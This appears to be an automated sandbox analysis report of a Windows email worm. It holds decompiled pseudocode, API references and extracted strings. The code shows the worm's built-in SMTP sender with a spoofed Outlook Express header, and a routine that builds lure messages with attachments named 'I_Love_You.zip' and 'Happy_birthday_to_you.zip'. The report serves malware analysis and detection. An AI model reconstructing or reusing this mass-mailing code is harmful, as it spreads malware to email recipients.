				intOrPtr _v1148;
				intOrPtr _v1152;
				intOrPtr _v1156;
				intOrPtr _v1160;
				intOrPtr _v1164;
				void _v1228;
				struct _SYSTEMTIME _v1244;
				int _v1248;
				void* _v1252;
				intOrPtr _v1256;
				void* _v1260;
				intOrPtr _v1264;
				void* _v1268;
				CHAR* _v1272;
				CHAR* _v1276;
				void* _v1280;
				signed int _v1284;
				signed int _v1288;
				intOrPtr _v1292;
				signed int _v1296;
				char _v1300;
				void* _v1304;
				intOrPtr _v1308;
				CHAR* _v1312;
				char _v1316;
				CHAR* _v1320;
				CHAR* _v1324;
				CHAR* _v1328;
				void* __ebx;
				int _t137;
				int _t138;
				char _t139;
				char* _t140;
				CHAR* _t166;
				void* _t193;
				CHAR* _t195;
				CHAR* _t200;
				CHAR* _t202;
				void* _t203;
				void* _t208;
				void* _t209;
				CHAR* _t215;
				void* _t216;
				void* _t217;
				CHAR** _t222;
				CHAR** _t226;

				_t208 = __edx;
				memset( &_v1068, 0, 0x400);
				_t209 =  &_v1132;
				asm("cld");
				memset(_t209, 0, 0xc << 2);
				 *((short*)(_t209 + 0xc)) = 0;
				_v1164 = 0x412620;
				_v1160 = 0x412624;
				_v1156 = 0x412628;
				_v1152 = 0x41262c;
				_v1148 = 0x412630;
				_v1144 = 0x412634;
				_v1140 = 0x412638;
				_v1136 = 0x41263c;
				memcpy( &_v1228, 0x40d424, 0xd << 2);
				GetSystemTime( &_v1244);
				_v1276 = _v1244.wSecond & 0x0000ffff;
				_v1280 = _v1244.wMinute & 0x0000ffff;
				_v1284 = _v1244.wHour & 0x0000ffff;
				_v1288 = _v1244.wYear & 0x0000ffff;
				_v1292 =  *((intOrPtr*)(_t216 + (_v1244.wMonth & 0x0000ffff) * 4 - 0x4c8));
				_v1296 = _v1244.wDay & 0x0000ffff;
				_v1300 =  *((intOrPtr*)(_t216 + (_v1244.wDayOfWeek & 0x0000ffff) * 4 - 0x488));
				_t137 = wsprintfA( &_v1132, "%s, %d %s %d %d:%d:%d GMT");
				_v1292 = 6;
				_v1296 = 1;
				_v1300 = 2;
				L00408708();
				_t222 = _t217 - 0x50c + 0x18 - 0xfffffffffffffff8;
				_t215 = _t137;
				if(_t137 == 0xffffffff) {
					L39:
					_v1312 = _t215;
					L004086C0();
					_t138 = 0;
				} else {
					_v44 = 2;
					_v1312 = 0x19;
					L004086F8();
					_v42 = _t137;
					_t139 = _a4;
					_v1316 = _t139;
					L004086E8();
					_t226 = _t222;
					_v40 = _t139;
					if(_t139 != 0xffffffff) {
						L4:
						_v1312 = 0x10;
						_t140 =  &_v44;
						_v1316 = _t140;
						_v1320 = _t215;
						L00408710();
						_t222 = _t226 - 0xc;
						if(_t140 == 0xffffffff) {
							goto L39;
						} else {
							 *_t222 = _t215;
							if(E004067E0(0) == 0) {
								goto L39;
							} else {
								_v1324 = _a4;
								_v1328 = "HELO %s\r\n";
								_t200 =  &_v1068;
								 *_t222 = _t200;
								if(E00406788(wsprintfA(??, ??), _t215, _t200) == 0) {
									goto L39;
								} else {
									_v1316 = _a8;
									if(E00406788(wsprintfA(_t200, "MAIL FROM: <%s>\r\n"), _t215, _t200) == 0) {
										goto L39;
									} else {
										_v1308 = _a12;
										if(E00406788(wsprintfA(_t200, "RCPT TO: <%s>\r\n"), _t215, _t200) == 0 || E00406788(_t150, _t215, "DATA\r\n") == 0) {
											goto L39;
										} else {
											_v1300 = _a8;
											if(E00406746(wsprintfA(_t200, "FROM: <%s>\r\n"), _t200, _t215, _t200) == 0) {
												goto L39;
											} else {
												_v1292 = _a12;
												if(E00406746(wsprintfA(_t200, "TO: <%s>\r\n"), _t200, _t215, _t200) == 0) {
													goto L39;
												} else {
													_v1284 =  &_v1132;
													if(E00406746(wsprintfA(_t200, "Date: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t160, _t200, _t215, "MIME-Version: 1.0\r\n") == 0) {
														goto L39;
													} else {
														_v1276 = _a16;
														if(E00406746(wsprintfA(_t200, "Subject: %s\r\n"), _t200, _t215, _t200) == 0 || E00406746(_t164, _t200, _t215, "X-Mailer: Microsoft Outlook Express 6.00.2800.1106\r\n") == 0) {
															goto L39;
														} else {
															_t166 = _a24;
															_v1276 = _t166;
															L0040C310();
															_t222 = _t222 - 4;
															if(_t166 == 0) {
																if(E00406746(_t166, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0 || E00406746(_t167, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
																	goto L39;
																} else {
																	_v1272 = _a20;
																	_v1276 = "\r\n%s\r\n";
																	_v1280 =  &_v1068;
																	if(E00406746(wsprintfA(??, ??),  &_v1068, _t215,  &_v1068) == 0) {
																		goto L39;
																	} else {
																		goto L36;
																	}
																}
															} else {
																if(E00406746(_t166, _t200, _t215, "Content-type: Multipart/Mixed; boundary=xContext\r\n") == 0 || E00406746(_t174, _t200, _t215, "\r\n--xContext\r\n") == 0) {
																	goto L39;
																} else {
																	if(_a32 == 0) {
																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=ISO-8859-1\r\n") == 0) {
																			goto L39;
																		} else {
																			goto L23;
																		}
																	} else {
																		if(E00406746(_t175, _t200, _t215, "Content-type: text/plain; charset=Windows-1251\r\n") == 0) {
																			goto L39;
																		} else {
																			L23:
																			if(E00406746(_t176, _t200, _t215, "Content-Transfer-Encoding: 8bit\r\n") == 0) {
																				goto L39;
																			} else {
																				_v1272 = _a20;
																				_v1276 = "\r\n%s\r\n";
																				_t202 =  &_v1068;
																				_v1280 = _t202;
																				if(E00406746(wsprintfA(??, ??), _t202, _t215, _t202) == 0 || E00406746(_t180, _t202, _t215, "\r\n--xContext\r\n") == 0) {
																					goto L39;
																				} else {
																					_v1264 = _a28;
																					if(E00406746(wsprintfA(_t202, "Content-type: Application/Octet-stream; name=\"%s\"; type:unknown\r\n"), _t202, _t215, _t202) == 0) {
																						goto L39;
																					} else {
																						_v1256 = _a28;
																						if(E00406746(wsprintfA(_t202, "Content-Disposition: attachment; filename=\"%s\"\r\n"), _t202, _t215, _t202) == 0 || E00406746(_t187, _t202, _t215, "Content-Transfer-Encoding: base64\r\n\r\n") == 0) {
																							goto L39;
																						} else {
																							_v1248 = 0;
																							_t203 = E004017F8(_t208, _a24,  &_v1248);
																							if(E00406746(_t191, _t203, _t215, _t191) != 0) {
																								_t193 = GlobalFree(_t203);
																								_t222 = _t222 - 4;
																								if(E00406746(_t193, _t203, _t215, "\r\n\r\n--xContext--\r\n") == 0) {
																									goto L39;
																								} else {
																									L36:
																									if(E00406788(_t171, _t215, "\r\n.\r\n") == 0 || E00406788(_t172, _t215, "QUIT\r\n") == 0) {
																										goto L39;
																									} else {
																										_v1272 = _t215;
																										L004086C0();
																										_t138 = 1;
																									}
																								}
																							} else {
																								GlobalFree(_t203);
																								_t222 = _t222 - 4;
																								goto L39;
																							}
																						}
																					}
																				}
																			}
																		}
																	}
																}
															}
														}
													}
												}
											}
										}
									}
								}
							}
						}
					} else {
						_t195 = _a4;
						_v1320 = _t195;
						L004086D8();
						_t222 = _t226 - 4;
						if(_t195 == 0) {
							goto L39;
						} else {
							_v40 =  *((intOrPtr*)( *(_t195[0xc])));
							goto L4;
						}
					}
				}
				return _t138;
			}

0x0040619a
0x004061c4
0x004061c9
0x004061cf
0x004061d7
0x004061d9
0x004061de
0x004061e8
0x004061f2
0x004061fc
0x00406206
0x00406210
0x0040621a
0x00406224
0x0040623e
0x00406249
0x00406258
0x00406263
0x0040626e
0x00406279
0x0040628b
0x00406296
0x004062a8
0x004062bd
0x004062c2
0x004062ca
0x004062d2
0x004062d9
0x004062de
0x004062e1
0x004062e6
0x0040672e
0x0040672e
0x00406731
0x00406739
0x004062ec
0x004062ec
0x004062f2
0x004062f9
0x00406301
0x00406305
0x00406308
0x0040630b
0x00406310
0x00406313
0x00406319
0x0040633b
0x0040633b
0x00406343
0x00406346
0x0040634a
0x0040634d
0x00406352
0x00406358
0x00000000
0x0040635e
0x0040635e
0x00406368
0x00000000
0x0040636e
0x00406371
0x00406375
0x0040637d
0x00406383
0x00406399
0x00000000
0x0040639f
0x004063a2
0x004063c4
0x00000000
0x004063ca
0x004063cd
0x004063ef
0x00000000
0x0040640d
0x00406410
0x00406432
0x00000000
0x00406438
0x0040643b
0x0040645d
0x00000000
0x00406463
0x00406469
0x0040648b
0x00000000
0x004064a9
0x004064ac
0x004064ce
0x00000000
0x004064ec
0x004064ec
0x004064ef
0x004064f2
0x004064f7
0x004064fc
0x004066b1
0x00000000
0x004066c7
0x004066ca
0x004066ce
0x004066dc
0x004066f2
0x00000000
0x00000000
0x00000000
0x00000000
0x004066f2
0x00406502
0x00406514
0x00000000
0x00406532
0x00406536
0x00406564
0x00000000
0x00000000
0x00000000
0x00000000
0x00406538
0x0040654a
0x00000000
0x00406550
0x0040656a
0x0040657c
0x00000000
0x00406582
0x00406585
0x00406589
0x00406591
0x00406597
0x004065ad
0x00000000
0x004065cb
0x004065ce
0x004065f0
0x00000000
0x004065f6
0x004065f9
0x0040661b
0x00000000
0x00406639
0x00406639
0x00406658
0x00406668
0x0040667d
0x00406682
0x00406697
0x00000000
0x0040669d
0x004066f4
0x00406706
0x00000000
0x0040671c
0x0040671c
0x0040671f
0x00406727
0x00406727
0x00406706
0x0040666a
0x0040666d
0x00406672
0x00000000
0x00406672
0x00406668
0x0040661b
0x004065f0
0x004065ad
0x0040657c
0x0040654a
0x00406536
0x00406514
0x004064fc
0x004064ce
0x0040648b
0x0040645d
0x00406432
0x004063ef
0x004063c4
0x00406399
0x00406368
0x0040631b
0x0040631b
0x0040631e
0x00406321
0x00406326
0x0040632b
0x00000000
0x00406331
0x00406338
0x00000000
0x00406338
0x0040632b
0x00406319
0x00406745

APIs

memset.MSVCRT ref: 004061C4
GetSystemTime.KERNEL32 ref: 00406249
wsprintfA.USER32 ref: 004062BD
socket.WS2_32 ref: 004062D9
htons.WS2_32 ref: 004062F9
inet_addr.WS2_32 ref: 0040630B
gethostbyname.WS2_32 ref: 00406321
connect.WS2_32 ref: 0040634D
wsprintfA.USER32 ref: 00406386
wsprintfA.USER32 ref: 004063B1
wsprintfA.USER32 ref: 004063DC
wsprintfA.USER32 ref: 0040641F
wsprintfA.USER32 ref: 0040644A
wsprintfA.USER32 ref: 00406478
wsprintfA.USER32 ref: 004064BB
lstrlen.KERNEL32 ref: 004064F2
wsprintfA.USER32 ref: 0040659A
wsprintfA.USER32 ref: 004065DD
wsprintfA.USER32 ref: 00406608
GlobalFree.KERNEL32 ref: 0040666D
GlobalFree.KERNEL32 ref: 0040667D
wsprintfA.USER32 ref: 004066DF
closesocket.WS2_32 ref: 0040671F

Part of subcall function 00406746: lstrlen.KERNEL32 ref: 00406753
Part of subcall function 00406746: send.WS2_32 ref: 00406771

closesocket.WS2_32 ref: 00406731

Strings

Content-Transfer-Encoding: base64, xrefs: 00406621
%s, %d %s %d %d:%d:%d GMT, xrefs: 004062AC
Mon, xrefs: 004061E8
TO: <%s>, xrefs: 0040643F
X-Mailer: Microsoft Outlook Express 6.00.2800.1106, xrefs: 004064D4
Content-type: Multipart/Mixed; boundary=xContext, xrefs: 00406502
Content-type: text/plain; charset=Windows-1251, xrefs: 00406538
Content-type: Application/Octet-stream; name="%s"; type:unknown, xrefs: 004065D2
Wed, xrefs: 004061FC
Thu, xrefs: 00406206
FROM: <%s>, xrefs: 00406414
HELO %s, xrefs: 00406375
RCPT TO: <%s>, xrefs: 004063D1
--xContext--, xrefs: 00406685
Date: %s, xrefs: 0040646D
&A, xrefs: 00406234
&A$&A(&A,&A0&A4&A8&A<&A, xrefs: 004062A1
., xrefs: 004066F4
Tue, xrefs: 004061F2
---, xrefs: 004061DE
QUIT, xrefs: 00406708
Fri, xrefs: 00406210
Content-type: text/plain; charset=ISO-8859-1, xrefs: 00406552, 0040669F
Content-Transfer-Encoding: 8bit, xrefs: 0040656A, 004066B3
Subject: %s, xrefs: 004064B0
DATA, xrefs: 004063F5
Content-Disposition: attachment; filename="%s", xrefs: 004065FD
%s, xrefs: 00406589, 004066CE
Sun, xrefs: 00406224
--xContext, xrefs: 0040651A, 004065B3
Sat, xrefs: 0040621A
MIME-Version: 1.0, xrefs: 00406491
MAIL FROM: <%s>, xrefs: 004063A6

Memory Dump Source

Source File: 00000000.00000002.272092118.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.272089061.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272105006.0000000000419000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272107983.000000000041C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272110481.000000000041D000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.272113008.000000000041E000.00000004.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_EAfIchN1gN.jbxd

Similarity

API ID: wsprintf$FreeGlobalclosesocketlstrlen$SystemTimeconnectgethostbynamehtonsinet_addrmemsetsendsocket
String ID: --xContext--$%s$--xContext$.$ &A$ &A$&A(&A,&A0&A4&A8&A<&A$%s, %d %s %d %d:%d:%d GMT$---$Content-Disposition: attachment; filename="%s"$Content-Transfer-Encoding: 8bit$Content-Transfer-Encoding: base64$Content-type: Application/Octet-stream; name="%s"; type:unknown$Content-type: Multipart/Mixed; boundary=xContext$Content-type: text/plain; charset=ISO-8859-1$Content-type: text/plain; charset=Windows-1251$DATA$Date: %s$FROM: <%s>$Fri$HELO %s$MAIL FROM: <%s>$MIME-Version: 1.0$Mon$QUIT$RCPT TO: <%s>$Sat$Subject: %s$Sun$TO: <%s>$Thu$Tue$Wed$X-Mailer: Microsoft Outlook Express 6.00.2800.1106
API String ID: 1487464711-219272833
Opcode ID: 666c0d740a43bd74909cf6117d8f5958c059585b5faa14fa9939e6f1f40405de
Instruction ID: 6e52e2717ca3ea0a11f7245c2747809bb71ce8739c615a88298817d05e4ee505
Opcode Fuzzy Hash: 666c0d740a43bd74909cf6117d8f5958c059585b5faa14fa9939e6f1f40405de
Instruction Fuzzy Hash: 53E12BB44087118AD710AF25D68429EBBF4AF44748F02897EF8C9A7385D77CC9A4CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00402288 Relevance: 79.8, APIs: 43, Strings: 10, Instructions: 346
stringsleepCOMMON

Download Yara Rule

C-Code - Quality: 48%

			E00402288(void* __eax, char _a4) {
				void* _v16;
				char _v76;
				char _v188;
				char _v300;
				char _v508;
				char _v780;
				char _v812;
				char _v1068;
				int _v1072;
				signed int _v1088;
				void* _v1128;
				char _v1132;
				void* _v1136;
				int _v1140;
				intOrPtr _v1148;
				int _v1152;
				char* _v1156;
				void* _v1160;
				char* _v1164;
				void* _v1168;
				void* _v1172;
				void* _v1180;
				void* _v1188;
				void* _v1196;
				char* _v1204;
				signed int _v1208;
				char* _v1212;
				void* _t350;
				void* _t351;
				signed int _t352;
				void* _t353;
				signed int _t354;
				int _t358;
				void* _t359;
				char _t363;
				void* _t365;
				void* _t367;
				intOrPtr* _t369;
				void** _t370;
				intOrPtr* _t374;

				_v1072 = 0;
				_t363 = _a4;
				_v1132 = _t363;
				L0040C310();
				_t367 = _t365 - 0x458;
				_t358 = 0;
				if(__eax <= 0x64) {
					_t350 =  &_v1068;
					memset(_t350, 0, 0xfa);
					_v1132 = _t363;
					_v1136 = _t350;
					L0040C320();
					_t369 = _t367 - 8;
					_v1140 = "mvcsv.qyy";
					_t351 =  &_v812;
					 *_t369 = _t351;
					E00404C38();
					_v1136 = _t351;
					_v1140 = 0x104;
					 *_t369 =  &_v780;
					E00404620();
					 *_t369 = 6;
					_t352 = E00404EAE();
					 *_t369 = 6;
					_v1088 = E00404EAE();
					while(_t352 == _v1088) {
						 *_t369 = 0xa;
						Sleep(??);
						_t369 = _t369 - 4;
						 *_t369 = 6;
						_v1088 = E00404EAE();
					}
					_v1136 = 0xc8;
					_v1140 = 0;
					 *_t369 =  &_v508;
					memset(??, ??, ??);
					_v1136 = 0x64;
					_v1140 = 0;
					 *_t369 =  &_v300;
					memset(??, ??, ??);
					_v1136 = 0x64;
					_v1140 = 0;
					 *_t369 =  &_v188;
					memset(??, ??, ??);
					_t359 =  &_v76;
					asm("cld");
					memset(_t359, 0, 0xa << 2);
					_t370 = _t369 + 0xc;
					_v1140 =  *(0x40d0c4 + _t352 * 4);
					_t353 = _t359;
					 *_t370 = _t359;
					L0040C328();
					_v1148 = 0x40ed9b;
					_v1152 = _t353;
					L0040C328();
					_v1156 =  *((intOrPtr*)(0x40d0c4 + _v1088 * 4));
					_v1160 = _t353;
					L0040C328();
					_v1164 = 0x40ed9d;
					_v1168 = _t353;
					L0040C328();
					_t374 = _t370 - 0xfffffffffffffff0;
					 *_t374 = 0x12;
					_t354 = E00404EAE();
					_v1172 = 0x40eda2;
					 *_t374 =  &_v1068;
					if(strstr(??, ??) != 0) {
						 *_t374 = 8;
						_t354 = E00404EAE() + 0x12;
					}
					if(_t354 <= 0x19) {
						switch( *((intOrPtr*)(_t354 * 4 +  &M0040EE08))) {
							case 0:
								_v1172 =  *((intOrPtr*)(0x40d0e0 + _t354 * 4));
								 *_t374 =  &_v188;
								L0040C328();
								_t375 = _t374 - 8;
								 *_t375 = 8;
								_v1180 =  *((intOrPtr*)(0x40d080 + E00404EAE() * 4));
								 *_t375 =  &_v508;
								L0040C328();
								_t376 = _t375 - 8;
								 *_t376 = 2;
								_v1188 = 0x40d148[E00404EAE()];
								 *_t376 =  &_v300;
								L0040C328();
								_t374 = _t376 - 8;
								goto L31;
							case 1:
								__eax =  *0x40d150;
								_v1172 =  *0x40d150;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1180 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1188 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 2:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d154; // 0x40eb4e
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 3:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d158; // 0x40eb5f
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 4:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d15c; // 0x40eb73
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 5:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(8);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d160; // 0x40eb86
								_v1188 = __eax;
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 6:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d098; // 0x40e5e0
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 7:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d09c; // 0x40e618
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 8:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d08c; // 0x40e558
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 9:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d088; // 0x40e508
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xa:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0a0; // 0x40e64c
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								_v1188 = "admin@bigtits.com";
								__eax =  &_v300;
								 *__esp =  &_v300;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xb:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(2);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xc:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1180 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1188 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0a4; // 0x40e688
								_v1196 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__edx =  &_v76;
								asm("cld");
								__ecx = 0xa;
								__eax = 0;
								__edi = __edx;
								__eax = memset(__edi, 0, 0xa << 2);
								__edi = __edi + __ecx;
								__ecx = 0;
								_v1204 = "I_Love_You.zip";
								_v1208 = __edx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xd:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x14);
								_v1180 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(5);
								_v1188 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0a8; // 0x40e6b2
								_v1196 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__edx =  &_v76;
								asm("cld");
								__ecx = 0xa;
								__eax = 0;
								__edi = __edx;
								__eax = memset(__edi, 0, 0xa << 2);
								__edi = __edi + __ecx;
								__ecx = 0;
								_v1204 = "Happy_birthday_to_you.zip";
								_v1208 = __edx;
								L0040C328();
								__esp = __esp - 8;
								goto L31;
							case 0xe:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(2);
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x16);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(4);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								goto L31;
							case 0xf:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0b4; // 0x40e785
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								if(E00404EAE(2) != 0) {
									__eax = E00404EAE(0x16);
									_v1188 = __eax;
									__ebx =  &_v300;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__eax = E00404EAE(4);
									_v1196 = __eax;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__edx =  &_v76;
									asm("cld");
									__ecx = 0xa;
									__eax = 0;
									__edi = __edx;
									__eax = memset(__edi, 0, 0xa << 2);
									__edi = __edi + __ecx;
									__ecx = 0;
									_v1204 = 0x40ede1;
									_v1208 = __edx;
									L0040C328();
									__esp = __esp - 8;
								} else {
									__eax = E00404EAE(0x15);
									_v1188 = __eax;
									__ebx =  &_v300;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__eax = E00404EAE(4);
									_v1196 = __eax;
									 *__esp = __ebx;
									L0040C328();
									__esp = __esp - 8;
									__edx =  &_v76;
									asm("cld");
									__ecx = 0xa;
									__eax = 0;
									__edi = __edx;
									__eax = memset(__edi, 0, 0xa << 2);
									__edi = __edi + __ecx;
									__ecx = 0;
									_v1204 = 0x40ede1;
									_v1208 = __edx;
									L0040C328();
									__esp = __esp - 8;
								}
								_v1212 = "mvcsvnd.qyy";
								__ebx =  &_v812;
								 *__esp = __ebx;
								__eax = E00404C38();
								_v1208 = __ebx;
								_v1212 = 0x104;
								__eax =  &_v780;
								 *__esp =  &_v780;
								__eax = E00404620();
								_v1072 = 1;
								goto L31;
							case 0x10:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0b8; // 0x40e7a0
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(0x16);
								_v1188 = __eax;
								__ebx =  &_v300;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								__eax = E00404EAE(4);
								_v1196 = __eax;
								 *__esp = __ebx;
								L0040C328();
								__esp = __esp - 8;
								_v1072 = 1;
								goto L31;
							case 0x11:
								__eax =  *(0x40d0e0 + __ebx * 4);
								_v1172 =  *(0x40d0e0 + __ebx * 4);
								__eax =  &_v188;
								 *__esp =  &_v188;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d0bc; // 0x40e7cc
								_v1180 = __eax;
								__eax =  &_v508;
								 *__esp =  &_v508;
								L0040C328();
								__esp = __esp - 8;
								__eax =  *0x40d148; // 0x40eb0c
